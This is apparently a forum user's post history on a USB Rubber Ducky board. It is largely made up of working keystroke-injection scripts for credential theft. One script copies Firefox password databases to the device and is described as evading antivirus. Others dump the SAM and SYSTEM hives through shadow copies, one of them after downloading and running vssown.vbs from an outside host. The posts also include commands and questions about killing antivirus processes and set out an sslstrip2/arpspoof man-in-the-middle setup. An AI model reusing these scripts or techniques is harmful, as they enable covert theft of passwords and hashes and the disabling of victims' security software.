Posts posted by shamwow
-
-
Have you done any HID changes to it? Is this a recent purchase? Please explain more on events that lead up to this. The ducky should install automatically with default drivers without any issues.
No, I haven't made any HID changes, and no, it's not a recent purchase. The ducky still works properly on another PC. What caused this problem was me unplugging the ducky while it was in the middle of automatically installing the driver.
-
I unplugged my ducky while it was automatically installing the drivers, and from now on the ducky is not recognised. How do I make the ducky go back to automatically installing the drivers without failing?
The error I get is
"Device driver software was not successfully installed."
-
This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site;
http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html
I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to perform the right operations.
In Windows 7, I can get Internet Explorer 7, 8, 9 and 10 passwords.
-
Is there a release date for this OS fingerprinting on the c_duck Twin Duck firmware?
-
I got it to work with the first one. I just had to replace the line with config-e466a.ps1 to config.ps1.
-
Is there a release date for OS fingerprinting firmware for Twin Duck?
-
You need to know the process name (e.g. for Microsoft Security Essentials, process is "msseces.exe" in task manager) and if it requires administrative privileges to kill the task. You can then proceed to do this with the cmd command
'taskkill /id "msseces.exe" /f /t'
That will kill the given process. If you need admin privileges, you need to make the rubber ducky start cmd with administrator privileges. See examples at USBRubberDucky.com.
NOTE: Some AVs are persistent. It may benefit you trying to open a given AV using the keyboard, then navigating to "Realtime Protection" turning that off, then once the script has executed, turn Realtime Protection back on again.
That didn't work on the current version of AVG.
-
I don't know how to use the shadowcopy, however you could just initiate a copy /b in a command prompt to whatever directory you want.
E.g.
copy /b %userprofile%\NTUSER.DAT E:\NTUSER.DAT
That did not work because the file is in use by another program. Anyway, I figured it out using system shadow copy.
-
Wireshark didn't tell me anything. Thanks for nothing.
-
asus eeepc 900
-
The point is that, at least Firefox honors the HSTS header, meaning that now that it has accessed Facebook over https once, it will continue to do so for the next year or so immediately, without first going the HTTP route (sslstrip works by MITM-ing the machine on its initial connection, which always defaults to using HTTP. When the initial connection goes straight for HTTPS, it can't do anything).
Can you try sslstrip2 and see what is causing the problem?
-
I used Internet Explorer and Firefox. Yes, my machine did have access to the machine when I used sslstrip1 and it worked.
-
I tried that but the webpage won't load. Maybe the problem is with sslstrip2 and not arpspoof.
Check the man page for arpspoof and try again.
It should probably be something like:
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
-
I installed sslstrip2 and dns2proxy and Python 2.7.3,
and I did the IP forwarding with the recommended iptables as it shows in the manual:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
After running python sslstrip.py -l 9000 and arp -i wlan0 target_ip gateway_ip and python dns2proxy.py,
I went to my test machine and tried hotmail.com; google.com; facebook.com ....
sslstrip2 is changing the URL but the webpage won't load. Can anyone tell me how to fix this?
These are the links that I downloaded from.
https://github.com/singe/sslstrip2
https://github.com/singe/dns2proxy
-
Sslstrip2 bypasses HSTS.
-
arpspoof -i wlan0 -r 192.168.0.2(target) -t 192.168.0.1(gateway)
-
ARP Spoof not working. It delivers a DoS instead. What am I doin' wrong?
In Kali Linux:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "1" > /proc/sys/net/ipv4/ip_forwarding
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
-
Hi,
I use the first one and it works (Using the twin duck). The only problem I had is that the keyboard layout had errors. This caused the rubber to not write the correct letters. What language are you using?
I am using English on a US keyboard. For the first script I did not see any SAM file in the userprofile directory.
-
How can I copy NTUSER.DAT using system shadowcopy in a ducky script?
The file is located in %userprofile%\NTUSER.DAT or (c:\users\<username here>\NTUSER.DAT)
-
I tried both of the following scripts but they aren't working. Can someone please fix these or provide another way to use Systemshadowcopy?
DELAY 1150 GUI r DELAY 1150 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1150 ALT y DELAY 1150 ENTER ALT SPACE DELAY 1150 STRING m DELAY 1150 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? 
{ $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? 
{ $_.Label -eq 'null' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1150 STRING C:\Windows\config-e466a.ps1 ENTER DELAY 1150 ALT F4 DELAY 1150 GUI r DELAY 1150 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1150 ALT y DELAY 1150 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1150 STRING m DELAY 1150 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1150 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING cd <DIRECTORY TO SAVE SAM AND SYSTEM TO>
ENTER
DELAY 200
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs
ENTER
DELAY 800
STRING del download.vbs
ENTER
DELAY 800
STRING cscript vssown.vbs /start
ENTER
DELAY 800
STRING cscript vssown.vbs /create
ENTER
DELAY 800
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
ENTER
DELAY 800
STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
ENTER
DELAY 800
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING del vssown.vbs
ENTER
STRING exit
ENTER
REM Make sure to change the DIRECTORY above.
-
Not sure if this is what you want but if you look at the killav.rb script in Meterpreter it might give you an idea how to do this.
Maybe I could kill the processes if I am able to get System Admin privileges in a console, but how do I become System Admin? I am only Admin and I don't have enough privileges to stop a service or kill an AV process.
-
I want it to kill my AV and then run Webbrowser Passview.exe
-
Can anyone tell me how I can use the USB Rubber Ducky to kill an Antivirus like AVG without getting Access Denied errors?
-
This is for stealing Firefox passwords using just Batch because it is not detected by AV.
If someone could make a tutorial on how to make a Batch file to steal Internet Explorer passwords using only Batch or PowerShell without triggering AV, I would appreciate it.
For this you need the Twin Duck firmware.
You also need to label your ducky drive as the word "DUCKY".
DEFAULT_DELAY 75
DELAY 3000
REM get a cmd prompt this way because it's admin:
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
REM the admin part.
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat contents
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "ducky"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto while1
ENTER
STRING :break
ENTER
REM
REM FINALLY COPY THE FIREFOX STUFF:
STRING mkdir %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\
ENTER
CONTROL z
ENTER
STRING DuckyWait.bat
ENTER
This is not needed but is the .bat file that the Duck creates in the Temp directory.
:while1
for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
if Exist %myd% (
goto break
)
timeout /t 30
goto while1
:break
mkdir %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\
To open and view the passwords just download Passwordfox.exe from the nirsoft site http://www.nirsoft.net/toolsdownload/passwordfox.zip
Manually select the profile folder that just got created in the Duck inside the new Firefox directory.
Automatic driver install failed. Is there a fix?
in Classic USB Rubber Ducky
I clicked uninstall but there was no option to delete the drivers. I then rebooted. That didn't fix it.